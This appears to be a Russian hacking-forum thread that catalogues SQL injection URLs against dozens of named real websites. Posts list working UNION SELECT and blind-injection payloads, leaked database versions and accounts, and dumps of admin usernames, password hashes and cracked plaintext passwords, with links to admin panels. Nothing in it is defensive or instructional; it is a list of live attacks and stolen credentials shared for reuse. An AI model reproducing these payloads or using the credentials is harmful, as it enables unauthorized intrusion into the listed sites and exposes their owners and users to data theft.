SQL Инъекции

http://www.m-trans.vbg.ru/bl.php?id=-105+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9
4.0.12:mtrans@localhost:mtrans

Есть таблица users
http://www.m-trans.vbg.ru/bl.php?id=-105+union+select+1,concat_ws(0x3a,id,login,pass),3,4,5,6,7,8,9+from+users

1:mtrans:0d0b9ff307d6c7f6

Админка: http://www.m-trans.vbg.ru/admin.php
------------
http://yellopagespakistan.com/yp/bl.php?subcat=254+and+substring(version(),1,1)=5

 

Скуля на http://www.incult.es

Уязвимый скрипт: http://www.incult.es/projectinfo.php?id=8

Версия БД: 5.0.32-Debian_7etch10-log
Имя БД: incult
Юзер: incult@localhost
ОС: pc-linux-gnu

Таблицы, не входящие в information_schema
http://www.incult.es/projectinfo.php?id=8%27+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_schema%3C%3E%27information_schema%27--+

Больше ничего интересного не нашёл.

 

Code:

http://www.csm.org.nz/distance/index.php?id=191%27+union+select+concat_ws(0x3a,version(),database(),user())+limit+1,1/*

version():4.0.27-standard-log
database():csm
user():[email protected]

Code:

http://www.csm.org.nz/distance/index.php?id=191%27+union+select+concat_ws(0x3a,user,pass)user+from+users+limit+1,1/*

thoseguys:55ffc53f170544b887252ff7e454e5a3

 

Скуля на http://biblioteca.unizar.es

Уязвимый скрипт:http://biblioteca.unizar.es/biblio.php?id=27

Версия БД: 4.0.20-standard
Имя БД: biblioteca-biblioteca
Юзер: [email protected]
ОС: pc-linux

Список юзеров и их паролей:
http://biblioteca.unizar.es/biblio.php?id=-27+union+select+concat_ws(0x3a,login,pwd),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+usuarios+limit+0,1--+

Привилегии FILE и доступа к mysql.user нет.

 

PR 2

Code:

http://www.colgate13.org/members.php?memid=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14/*

Database version : 4.1.16-standard-log
Database name : colgate13
User name : [email protected]

 

третья мускуль

http://www.bicentenary.tas.gov.au/text.php?id=66+and+substring(version(),1,1)=3

 

Code:

http://www.akpr.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6

[email protected]:u44790:5.0.67-log

Code:

http://www.newchemistry.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9

[email protected]:u44790_3:5.0.67-log

Code:

http://polymery.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9

[email protected]:u44790:5.0.67-log

Code:

http://petrochemistry.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9

[email protected]:u44790_2:5.0.67-log

 

PR 6

Code:

http://www.mhfa.com.au/instructor_details.php?id=-694+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/*

Database version : 4.1.22-standard-log
Database name : mhfa_db
User name : [email protected]

 

Code:

http://php.louisville[SIZE=4][COLOR=Lime].edu[/COLOR][/SIZE]/news/multimedia/multimedia.php?id=-99999+union+select+1,2,3,4,5,6,version(),8,9,10,11/*

Database Version: 5.0.27-standard
Database name: releases
User name: [email protected]

 

PR3
http://mywebs.ru/text.php?id=-10+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5
5.0.67-log:[email protected]:u50510
-------------
Решил пройтись слегка по разделу Портфолио... нашел ещё несколько уязвимых сайтов:

PR4, ТИЦ 130
http://triluchnik.ru/text.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(),database())
5.0.67-log:[email protected]:u83453

Заинтересовала таблица: pixelpost_config
Выдираем данные
http://triluchnik.ru/text.php?id=-16+union+select+1,concat_ws(0x3a,id,admin,password,email)+from+pixelpost_config
1:admin:e807f1fcf82d132f9bb018ca6738a19f:[email protected]
Расшифровываем:
e807f1fcf82d132f9bb018ca6738a19f = 1234567890

Есть вход админский через http://triluchnik.ru/admin
там авторизация видимо через .htaccess, с указанными данными не получается.

 

www.surf2surf.co.nz
[PR=4]

Code:

http://www.surf2surf.co.nz/page.php?id=-111+union+select+1,concat_ws(0x0b,version(),user(),database()),3,4,5,6,7

Версия - 5.0.45
Юзер - surf2surf@localhost
БД - surf2surf

P.S. доступ к табличкам закрыт

 

PR2, ТИЦ 40
http://nissanbu.ru/show_new.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4
4.0.27-max-log:[email protected]:nissan60

------
PR2, ТИЦ 90
http://www.honda.spb.ru/news-text.php?id=-158+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7
4.1.22:ralfart@localhost:ralfart

p.s. Dimonx есть таблица admanager с кучей таблицей, всё доступно. кавыряй.

 

http://www.promiseland.it/view.php?id=-2975/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

Database Version: 5.0.45-log
Database name: promiseland_news
User name: promise_guest@localhost

 

PR1
http://www.akalita.com/press/text.php?id=-4+union+select+1,concat_ws(0xa,version(),user(),database()),3,4,5
5.0.67-log [email protected] u98256_akalita

Видимо на одном акке, несколько сайтов, которые пока не нашел
Доступно несколько баз данных: u98256,u98256_1981,u98256_blog,u98256_akalita
u98256_blog - вордпрессовская база данных.

вытащил с wp_users админа
1:admin:$P$Bol8Q7tR5wPHFqk6NkjB7R6/7FdLFa0

в других базах ничего касающегося авторизации нет, в конфигах видимо всё прописано.

 

PR6

Code:

http://corsair.cs.iupui[SIZE=4][COLOR=White].edu[/COLOR][/SIZE]:20191/picturegallery/photo.php?id=-99999+union+select+1,2,3,version(),5/*

Database Version: 5.0.22-standard
Database name: jsellmer_db
User name: jsellmer@localhost

Getting Data from table phpbb_users ( Rows) from database test
Fields username:user_password
[0]:Anonymous:
[1]:arowls:39b35d4edd6999d6bfaf563bfa2bb661
[2]:solivares:b2693d9c2124f3ca9547b897794ac6a1(maya)
[3]:Brian Lewis:2f2b4669f9c0d578a94c9a32fc72f1c8

Getting Data from table userList ( Rows) from database test_db
Fields userass:email
[0]:nidodsonassword:[email protected]
[1]:na3dassword:[email protected]

 

PR0, ТИЦ 0
http://www.zhukovs.ru/text.php?id=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11/*
4.0.20-log:brainz@localhost:brainz
Есть база users, поля подобрал только user_id, user_password... искал где хранится имя пользователя, ... кончилась фантазия.
http://www.zhukovs.ru/text.php?id=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user_id,user_password),9,10,11+from+users/*
1:76a2173be6393254e72ffa4d6df1030a
Хэш расшифровался легко:
76a2173be6393254e72ffa4d6df1030a = passwd

 

www.tech-pack.co.nz
[PR: 1]

Code:

http://www.tech-pack.co.nz/page.php?id=11+union+select+1,2,3,4,concat_ws(0x0b,version(),user(),database()),6,7,8

Версия - 4.0.26-standard
Юзер - techp@localhost
БД - techp

www.todayskitchens.co.nz
[PR: 2]

Code:

http://www.todayskitchens.co.nz/page.php?id=-11+union+select+1,2,3,4,concat_ws(0x0b,version(),user(),database()),6,7,8

Версия - 4.0.26-standard
Юзер - todaysk@localhost
БД - todaysk

www.adventureconcepts.co.nz
[PR: 3]

Code:

http://www.adventureconcepts.co.nz/page.php?id=11+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables

Версия - 5.0.37-standard
Юзер - advent_cms@localhost
БД - advent_cms

Code:

http://www.adventureconcepts.co.nz/page.php?id=11+union+select+1,2,3,4,concat_ws(0x3a,table_name,column_name),6,7,8+from+information_schema.columns

Все таблицы и колонки к ним

www.gearcutting.co.nz
[PR: 1]

Code:

http://www.gearcutting.co.nz/page.php?id=-11+union+select+1,2,3,4,concat_ws(0x0b,version(),user(),database()),6,7,8

Версия - 4.0.26-standard
Юзер - gearcms@localhost
БД - gearcms

www.clockworkstudio.co.nz
[PR: 2]

Code:

http://www.clockworkstudio.co.nz/page.php?id=-11'+union+select+1,2,3,4,5,6,concat_ws(0x0b,version(),user(),database()),8,9,10/*

Версия - 4.0.27-standard-log
Юзер - [email protected]
БД - clockwork

Табличка с юзерами:

Code:

http://www.clockworkstudio.co.nz/page.php?id=-11'+union+select+1,2,3,4,5,6,concat_ws(0x0b,username,password),8,9,10+from+users+limit+1,1/*

nick
378867a9bad163c4c77062685b3584af:cl0ckw0rk

Админка

Code:

www.clockworkstudio.co.nz/admin/

Code:

Логин - nick
Пасс - cl0ckw0rk

 

PR5
http://www.stadtumbau-ost.info/index.php?request=/service/email-abo/nl-text.php?id=-41+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4
4.1.22-standard-log:db63113@local2:db63113

PR5, ТИЦ 140
http://www.uapravo.org/text.php?id=-1189+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11
5.0.32-Debian_7etch10-logleps@localhost:uapravo
просмотрел таблицы, что касается пользователей, ничего нет...

PR4, ТИЦ 1400
http://edina-rodina.org/text.php?id=14+and+substring(version(),1,1)=5

PR4
http://www.lennartpersson.se/text.php?ID=910+and+substring(version(),1,1)=5

PR4
http://www.zionmag.org/text.php?id=633+and+substring(version(),1,1)=4

PR4, ТИЦ 10
http://auto.properm.ru/sale/text.php?id=7177+and+substring(version(),1,1)=5/*

PR0, ТИЦ 0
http://realmagazine.ru/rmgid/text.php?id=-604+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database())
4.1.22-log:[email protected]:wwwrealmagaziner_wwwrealmagaziner

PR0, ТИЦ 0
http://www.mdsg.org.uk/text.php?ID=-0+and+substring(version(),1,1)=5

 

version: 5.0.45
user: amanmysql@localhost
database: db_news


tables

columns

inset into news
columns